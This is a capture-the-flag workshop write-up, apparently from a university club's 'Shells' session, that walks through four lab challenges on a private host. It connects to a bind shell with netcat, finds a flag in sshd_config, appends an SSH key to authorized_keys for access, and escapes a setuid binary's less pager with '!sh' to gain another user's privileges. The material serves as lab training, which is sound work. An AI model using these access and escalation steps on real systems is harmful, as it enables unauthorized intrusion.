Introduction
0x03 Shells session presented by the UQ Cyber Squad. Access via OpenVPN connection. OpenVPN configuration bundle provided during the workshop.
Challenge 1 - Family Binding Time - 10pts
Let’s bind together at 192.168.57.11:8297
nc 192.168.57.11 8297
id
uid=1002(user) gid=1002(user) groups=1002(user)
pwd
/home/user
ls -las
total 60
4 drwxr-xr-x 3 user user 4096 Mar 27 06:02 .
4 drwxr-xr-x 4 root root 4096 Mar 24 02:13 ..
4 -rw------- 1 user user 1584 Mar 26 01:26 .bash_history
4 -rw------- 1 user user 105 Mar 26 00:50 .lesshst
4 -rw------- 1 user user 5 Mar 24 03:38 .python_history
4 drwxr-xr-x 2 user user 4096 Mar 26 00:59 .ssh
8 -rw------- 1 user user 5066 Mar 27 06:01 .viminfo
4 -r-xr-xr-x 1 root user 892 Mar 27 06:02 init_shell.py
20 -rwsr-xr-x 1 richard root 16728 Mar 26 00:54 read_secret_message
4 -rw-r--r-- 1 user user 24 Mar 24 02:14 user.txt
cat user.txt
flag{n1c3_b0nd1ng_t1m3}
Challenge 2 - shhhhhhhh - 20pts
How do I ssshhhhh? How do I know how to?
- I actually got to this one last because the hint was very ambiguous, and I just happened to check the ssh daemon configuration sshd_config file.
cat /etc/ssh/sshd_config
# $OpenBSD: sshd_config,v 1.103 2018/04/09 20:41:22 tj Exp $
# This is the sshd server system-wide configuration file. See
# sshd_config(5) for more information.
# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin
# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented. Uncommented options override the
# default value.
#Port 22
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::
#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key
# Ciphers and keying
#RekeyLimit default none
# Logging
#SyslogFacility AUTH
#LogLevel INFO
# Authentication:
#LoginGraceTime 2m
PermitRootLogin yes
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10
# flag{c0nf1gur3d_pr0p3rly}
#PubkeyAuthentication yes
# Expect .ssh/authorized_keys2 to be disregarded by default in future.
#AuthorizedKeysFile .ssh/authorized_keys .ssh/authorized_keys2
#AuthorizedPrincipalsFile none
#AuthorizedKeysCommand none
#AuthorizedKeysCommandUser nobody
# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes
# To disable tunneled clear text passwords, change to no here!
PasswordAuthentication yes
#PermitEmptyPasswords no
# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no
# Kerberos options
#KerberosAuthentication no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
#KerberosGetAFSToken no
# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes
#GSSAPIStrictAcceptorCheck yes
#GSSAPIKeyExchange no
# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication. Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
UsePAM yes
#AllowAgentForwarding yes
#AllowTcpForwarding yes
#GatewayPorts no
X11Forwarding yes
#X11DisplayOffset 10
#X11UseLocalhost yes
#PermitTTY yes
PrintMotd no
#PrintLastLog yes
#TCPKeepAlive yes
#PermitUserEnvironment no
#Compression delayed
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS no
#PidFile /var/run/sshd.pid
#MaxStartups 10:30:100
#PermitTunnel no
#ChrootDirectory none
#VersionAddendum none
# no default banner path
#Banner none
# Allow client to pass locale environment variables
AcceptEnv LANG LC_*
# override default of no subsystems
Subsystem sftp /usr/lib/openssh/sftp-server
# Example of overriding settings on a per-user basis
#Match User anoncvs
# X11Forwarding no
# AllowTcpForwarding no
# PermitTTY no
# ForceCommand cvs server
- Submitted:
flag{c0nf1gur3d_pr0p3rly}
Challenge 3 - Mr Richard - 20pts
More is less for Mr Richard
- Generate a local RSA keypair using the ssh_keygen command for the user on the parrot host
- Manually copied the generated public key into the authorised_keys file by copying and pasting into the terminal window
ls -l ./.ssh/
total 4
-rw-r--r-- 1 user user 563 Mar 26 00:59 authorized_keys
cat ./.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDViXPD0mL2mR03VSqXgSv0vOvjaVTudElLEkAOkiKzgicvJoJiJyx/Qu3FbCN5Y5iDhKZT7L7wzEGo178U9QdJbpq3Go+ULQ8cky96ZvU605+7CQmpcqu6xGuoApJz/V3KgTlRcmA8DJLEPMSWYpp8yrTyTkzcu24Z/YrHxoLKkQP/paj1y1/RnewUk/8/N3AoeJTD/RInPXufZX1/Cq+eonyt/lWV3ypZrUGls3KEFSGbSH6dHSypld2CNUNJxz5KmXg8M8bNXIEfLPzluREP9bNULh1gXbcfHqKoI+gKV4ZeodECwb1QSjvKaJffr1LtnHnt+mK6eJEjt7RKRqHc/vzEklt/xOGH+B6/Xjoc2b8K8I2tV9dHIhBqG8CT2NF0E/qqzbCAmwI2fPuZNUApZBx/oASabssONUvzD8vT0tW9HhnfD8MFHVJZWs1hG5pjP4V41Js8OEvqflFiqLsyqiGsZkn0R2HpsLEXIfC+2pjIYkr0RWtMpruwJOKHPPE= kali@kali
netstat -tln
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 192.168.57.11:8297 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp6 0 0 :::80 :::* LISTEN
tcp6 0 0 :::22 :::* LISTEN
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDJnrpgXGIVZnw5zdTZMc5a7bXafaA9GxT2X5ZcO8UBYsSnTHRTl/jcxlHbvghDnNyl51N6McIrCNxjn+SmdxV9zz6LFe2a6pBCGWYGot7sfIXte4LOSXAZZHz0O6GjSR91gJv6sDpo8TTq8/J/VKLzmRA3fIounLunDpOxhRgBa6rG1QXuNm6PBBcYaxL69ygGKR630RmaxKxYvSkHB126AmYi+8hBXvnsDtfg6BX9koIJP3aNyek/7VPrTAn3peV/H7uvWGDZOYoSRCwuMYEFQcyJfI0R382wWCMWaMMyamTTYepyt9tiqGKl5DZzErfhTpyXHzql/Due4I9aRuWo7naJ8AesIw5vdYXvkPwfvEiFRiK1HFde/5+5a7uEJev1q1kL5S77Kjr/Bo3FVRvxfMqsByOlQc7ME60AnKXtxOAzbyFRjXDaTKZcmNMeUoV42ogATxY2RHDHGrvMdRR5qB4AldGwLKFump0ekWUy6Gx/wT/GRnX/4ml1ods7B2s= user@parrot" >> ./.ssh/authorized_keys
cat ./.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDViXPD0mL2mR03VSqXgSv0vOvjaVTudElLEkAOkiKzgicvJoJiJyx/Qu3FbCN5Y5iDhKZT7L7wzEGo178U9QdJbpq3Go+ULQ8cky96ZvU605+7CQmpcqu6xGuoApJz/V3KgTlRcmA8DJLEPMSWYpp8yrTyTkzcu24Z/YrHxoLKkQP/paj1y1/RnewUk/8/N3AoeJTD/RInPXufZX1/Cq+eonyt/lWV3ypZrUGls3KEFSGbSH6dHSypld2CNUNJxz5KmXg8M8bNXIEfLPzluREP9bNULh1gXbcfHqKoI+gKV4ZeodECwb1QSjvKaJffr1LtnHnt+mK6eJEjt7RKRqHc/vzEklt/xOGH+B6/Xjoc2b8K8I2tV9dHIhBqG8CT2NF0E/qqzbCAmwI2fPuZNUApZBx/oASabssONUvzD8vT0tW9HhnfD8MFHVJZWs1hG5pjP4V41Js8OEvqflFiqLsyqiGsZkn0R2HpsLEXIfC+2pjIYkr0RWtMpruwJOKHPPE= kali@kali
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDJnrpgXGIVZnw5zdTZMc5a7bXafaA9GxT2X5ZcO8UBYsSnTHRTl/jcxlHbvghDnNyl51N6McIrCNxjn+SmdxV9zz6LFe2a6pBCGWYGot7sfIXte4LOSXAZZHz0O6GjSR91gJv6sDpo8TTq8/J/VKLzmRA3fIounLunDpOxhRgBa6rG1QXuNm6PBBcYaxL69ygGKR630RmaxKxYvSkHB126AmYi+8hBXvnsDtfg6BX9koIJP3aNyek/7VPrTAn3peV/H7uvWGDZOYoSRCwuMYEFQcyJfI0R382wWCMWaMMyamTTYepyt9tiqGKl5DZzErfhTpyXHzql/Due4I9aRuWo7naJ8AesIw5vdYXvkPwfvEiFRiK1HFde/5+5a7uEJev1q1kL5S77Kjr/Bo3FVRvxfMqsByOlQc7ME60AnKXtxOAzbyFRjXDaTKZcmNMeUoV42ogATxY2RHDHGrvMdRR5qB4AldGwLKFump0ekWUy6Gx/wT/GRnX/4ml1ods7B2s= user@parrot
- Attempted to SSH onto the host using the private key as the
user
user.
ssh -i user_rsa [email protected]
Linux Tom 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Mar 26 00:59:42 2020 from 192.168.57.3
$ id
uid=1002(user) gid=1002(user) groups=1002(user)
$ ls -las
total 60
4 drwxr-xr-x 3 user user 4096 Mar 27 06:02 .
4 drwxr-xr-x 4 root root 4096 Mar 24 02:13 ..
4 -rw------- 1 user user 1584 Mar 26 01:26 .bash_history
4 -r-xr-xr-x 1 root user 892 Mar 27 06:02 init_shell.py
4 -rw------- 1 user user 105 Mar 26 00:50 .lesshst
4 -rw------- 1 user user 5 Mar 24 03:38 .python_history
20 -rwsr-xr-x 1 richard root 16728 Mar 26 00:54 read_secret_message
4 drwxr-xr-x 2 user user 4096 Mar 26 00:59 .ssh
4 -rw-r--r-- 1 user user 24 Mar 24 02:14 user.txt
8 -rw------- 1 user user 5066 Mar 27 06:01 .viminfo
- Ran the read_secret_message command, ran strings on the command and assumed it was running the
less
command, resize the terminal window to cause paging in less, then escaped out using!sh
. Once out, grabbed the richard flag.
$ ./read_secret_message
$ id
uid=1001(richard) gid=1002(user) groups=1002(user)
$ pwd
/home/user
$ cd ../richard
$ ls -las
total 56
4 drwxr-xr-x 3 richard richard 4096 Mar 26 01:00 .
4 drwxr-xr-x 4 root root 4096 Mar 24 02:13 ..
4 -rw------- 1 richard richard 1233 Mar 26 01:09 .bash_history
4 -rw------- 1 richard richard 34 Mar 24 03:07 .lesshst
4 -rw-r--r-- 1 root root 597 Mar 24 03:05 message.txt
20 -rwsr-xr-x 1 richard root 16728 Mar 26 00:53 read_secret_message
4 -rw-r----- 1 richard richard 210 Mar 26 00:53 read_secret_message.c
4 -rw-r----- 1 richard richard 22 Mar 24 02:45 richard.txt
4 drwxr-xr-x 2 richard user 4096 Mar 26 01:00 .ssh
4 -rw------- 1 richard richard 1662 Mar 24 03:22 .viminfo
$ cat richard.txt
flag{1_4m_mr_r1ch4rd}
Challenge 4 - Too Much T Mux - 20pts
There’s so many!!!
- Listed the tmux sessions using the
tmux ls
command - Manually attached to each session to find the flag using the
tmux a -t session_name
command - Found the flag in
tmux ls
bluh: 1 windows (created Tue Mar 24 02:47:54 2020) [238x48]
find_me: 1 windows (created Tue Mar 24 02:48:24 2020) [238x48]
goodluck: 1 windows (created Tue Mar 24 02:48:11 2020) [238x48]
hahahahaha: 1 windows (created Tue Mar 24 02:48:02 2020) [238x48]
j: 1 windows (created Tue Mar 24 02:51:36 2020) [238x48]
this_is_evil: 1 windows (created Tue Mar 24 02:48:57 2020) [238x48]
richard@Tom:~$ tmux a -t goodluck
[detached (from session goodluck)]
- Submitted: flag{d3ep_d0wn_und3r}